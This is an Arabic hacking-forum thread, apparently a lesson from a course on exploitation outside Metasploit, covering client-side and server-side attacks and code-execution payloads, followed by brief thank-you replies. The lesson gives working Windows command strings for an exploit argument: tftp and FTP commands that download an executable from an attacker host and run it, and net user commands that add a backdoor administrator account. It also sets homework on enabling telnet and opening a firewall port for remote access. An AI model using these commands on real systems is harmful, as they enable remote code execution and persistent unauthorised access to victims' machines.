![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
|
السلام عليكم ورحمه الله وبركاته درسنا اليوم مهم جدا لعده اسباب , قبل لا ابدأ صارت الاسأله كثيره بالرسايل الخاصه لدرجه ان نصف الاسأله متشابهة بكل مره لذلك اي سؤال رجاء يطرح بالموضوع المخصص , المهم نرجع لمحور حديثنا , اسباب كتابتي للدرس : 1- ايضاح ان الميتاسبلويت الطريقه الوحيده 2- توضيح لاغلب الثغرات التي نستخدمها 3- شرح للثغرات التي لا تستخدم shellcode نبدأ وعلى بركه الله ,, اغلب الاشخاص يظن ان كلمه الاختراق مربوطه بالميتاسبلويت وهذا خطأ ! الميتاسبلويت اداه قويه لكن هنالك ثغرات ليست بالميتاسبلويت وبعض المرات تعتبر من 0-day لذلك سأشرح شرح سريع للتعامل مع الثغرات خارج ايطار الميتاسبلويت ! 1- ثغرات خارج الميتاسبلويت نأخذ مثلا ثغره [] هذه الثغره في برنامج AOL والبرنامج مشهور على العموم افتح الثغره , راح تلاحظ ActiveX او حتى html , بعد الملاحظه راح نعرف ان الثغره تستغل عن طريق المتصفح , بمعنى ادق الضحيه راح يتصفح هذه الصحفه ونستغل عن طريقها victim ------------------------> attacker victim ----------------------------------> attacker ......................----------------------------------> نلاحظ ان اول السينارويو , 1- الضحيه اتصل بالمهاجم 2- المهاجم ارسل الثغره وبنفس الوقت الضحيه شغل الثغره 3- حصلتا على اتصال عكسي نستنج ان هذه الثغره من نوع client-side attack . نذهب الى shellcode , كيفيه تغييره دائما بأستغلال الثغره يكتب المكتشف shellcode = او ممكن يكتب الاسم غير لكن دائما تكتب على هذا الشكل . لكن الـ shellcode في هذه الثغره كيف اكتبه , شكله غريب ؟! shellcode في هذه الثغره مكتوب على الجافاسكربت وممكن تستخدم اداه msfpayload . 2- توضيح لاغلب الثغرات الثغرات تنقسم الى قسمين اساسيين غير الاقسام في الدرس الثاني . توضيح: القسمين هذا عام بمعنى مثال مع فارق التشبيه , الانسان يا مسلم يا كافر اذا كان مسلم يكون مثلا سني او شيعي واذا كان كافر ممكن يكون يهودي نصراني . المهم A - ثغرات تكون تحت مظله server-side attacks من اسمها المهاجم يرسل الاستغلال مباشره للضحيه attacker -----------------------> victim ثم من بعدها يشغل الشل كود . B - ثغرات تكون تحت مظله client-side attacks وهذه العكس لان الضحيه يتصل بالمهاجم ومن ثم يتم الاستغلال victim -----------------> attacker ومن ثم يتم تشغيل الشل كود . استغلال الثغرات تكون مكتوبه بلغات مختلفه perl ,python ,c , ruby etc وغالبا كاتب الاستغلال يكتبها بالبدايه .. وايضا بأمكانك معرفتها بنفسك . 3- ثغرات لا تستخدم shellcode او بعض المشاكل التي تواجه الـ shellcode [] ننظر الى هذه الثغره مثلا , مكتشفه من الاخ , عبدالله.. المهم لو تابعنا الثغره مالها shellcode هل نعتبر ان الثغره غبيه اكيد لا . بعض الثغرات تستعمل shellcode لكن حين نستخدم bindshell راح يحظره الجدار الناري attacker --------------------X| victim البعض يقول نستخدم reverseshell او اتصال عكسي , نستخدم لكن بعض المرات الجدار الناري يحظر الاتصال الخارج . attacker------------> | X <-- victim مافيه الا find socket shellcod وهذا له ايضا مشاكله الخاصه بقى عندنا نستخدم code execution shellcode الثغره اللي بالسابق تستعمل code execution لذلك راح نستخدم بعض الاوامر اللي تفيدنا بأختراق الضحيه . اولا الثغره تستخدم لتشغيل مثلا cmd.exe بمعنى اخر بأمكاننا التحكم بالاوامر 1- تحميل الملف ومن ثم تشغيله عن طريق tftp . نقدر نحمل ملف ونشغله عن طريق tftp مطلباته وجود tftp client على جهاز الضحيه وايضا tftp server على جهاز المهاجم استعماله يكون مثلا كود:
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -i attacker_IP GET file.exe && file.exe" 2- تحميل الملف ومن ثم تشغيله عن طريق ftp . مطلباته يكون عند الضحيه ftp client طريقه الاستخدام ftp -s:attacker.txt كود:
arg1="c:\WINDOWS\system32\cmd.exe /c echo open ×.×.×.× 21 > silv3r00t.txt && echo USER silv3r00t >> silv3r00t.txt && echo bin >> silv3r00t.txt && echo GET silv3r00t.exe >> silv3r00t.txt && echo bye >>silv3r00t.txt && ftp:-s silv3r00t.txt && silv3r00t.exe" نشرحه على السريع . لزم تكتب بلمف تكست عن طريق االاوامر هذي echo open ×.×.×.× 21 > silv3r00t.txt طبعا الان كتبنا امر يفتح الموقع الفلاني على البورت 21 = اف تي بي echo USER silv3r00t >> silv3r00t.txt اليوزر نيم حق حسابي ,, echo PASS silv3r00t >> silv3r00t.txt الباسورد حقي للحساب ,, echo bin >> silv3r00t.txt طبعا الان على وضع باينري ,, echo GET silv3r00t.exe >> silv3r00t.txt الان حنا سحبنا الملف ,, echo bye >>silv3r00t.txt هذا خروج من ftp ftp -s:silv3r00t.txt تحميل الملف silv3r00t.exe نشغل الملف .. 3- الطريقه الثالثه هي اضافه يوزر اضافه يوزر اسهل طريقه لكن مشكلتها ان المهاجم يكون على نفس الشبكه . وهي على هذا الشكل net user userna me password /add net localgroup Administrateurs userna me /add مثال كود:
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net localgroup Administrateurs silv3r00t /add " نروح لسؤال اليوم 1- اكتب خطوات كل من أ- تفعيل خدمه telnet بأستخدام sc ب- عمل يوزر للدخول على خدمه telnet ج- فتح بورت في الجدار الناري يسمح البورت 23 و السماح بـ IP واحد فقط للدخول على البورت صحيح انه شوي صعب لكن بالتوفيق SiLv3r00t V4-team.com
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
لاهنت اخي رعش جزاك الله الف خير تقبل مروري |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
بوركت اخي رعش |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
البطل يعيش بطل و انت بطل |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
مشكووووووووووووور يالغالي |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 77
|
|
| 00X , 3bjo , 3bse , 4V3NG3R , abdelhakmco1 , airami , AKBIROCK3 , alaa24k , alex mex , ali_abdennadher , almassiva , amrhakers , Anis Gladiator , ApOcalYpse , aqm , aza , BELHADJ47 , bem981 , الشبح المرح , D3r K0n!G , dawaima , doubleali , DR.X , elmojahid , ExPLo!T_Dz , hacoo0 , hamza_hack_dz , imed28 , حكمي , john23 , khalil19000 , lasbat-dz , lennix , Lonely , loock , m.mohammed , M3GO , maaahs , maroc-sinper-eye , marwane , MatrixGuy , MdMn HaCk3r , mo3eth , molotov , monster7 , Mr-viros , Mr.3Jr4M , n2nhacker , okita0039 , owner02 , سني هكر , سجين الوطن , سيزززر , pipou-dz , r00t-Dz , racin9 , RaYm0n , rDNix , rOotdz , S-japonia33 , S1LV3rS3rf3r , S4wDz , Saif Al-Naar , SAMIRALG , sazer_2010 , shadid , shapola , sn.ip , SnIPeR-NJD , Th3 WiTch3r-Dz , عقرب الغربية , ViRuS_Ra3cH , Vladimir , WOLF_DZ , yasMouh , ZiRbE$t , zrx |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| الدرس الخامس : التعامل مع الميتاسبلويت | ViRuS_Ra3cH | دورة الميتاسبلويت | SiLv3r00t | 7 | 08/01/2014 14:29 |
| الدرس الثاني: شرح الميتاسبلويت وملفاته | ViRuS_Ra3cH | دورة الميتاسبلويت | SiLv3r00t | 6 | 13/02/2011 21:30 |
| (الدرس السابع ) - اكتشاف ثغرة Database Backup Dump Vulnerability | ViRuS_Ra3cH | دورة اكتشاف الثغرات | Dr.BiLLi | 4 | 11/01/2011 19:52 |
| الدرس السابع - التشفير ببعبض الحركات في الهيكس لتطيير الحمايات | أحمد العرجان | دورة التــــشـــفـــــير | 6 | 11/12/2010 14:56 |
| [الدرس السابع عشر] حمـآية الجهآز وإغلاق البورتات الخطرة على الـ Windows ! | ViRuS_Ra3cH | دورة حماية الاجهزة | Evil-Cod3r | 3 | 01/09/2010 21:25 |
![]() |
![]() |
![]() |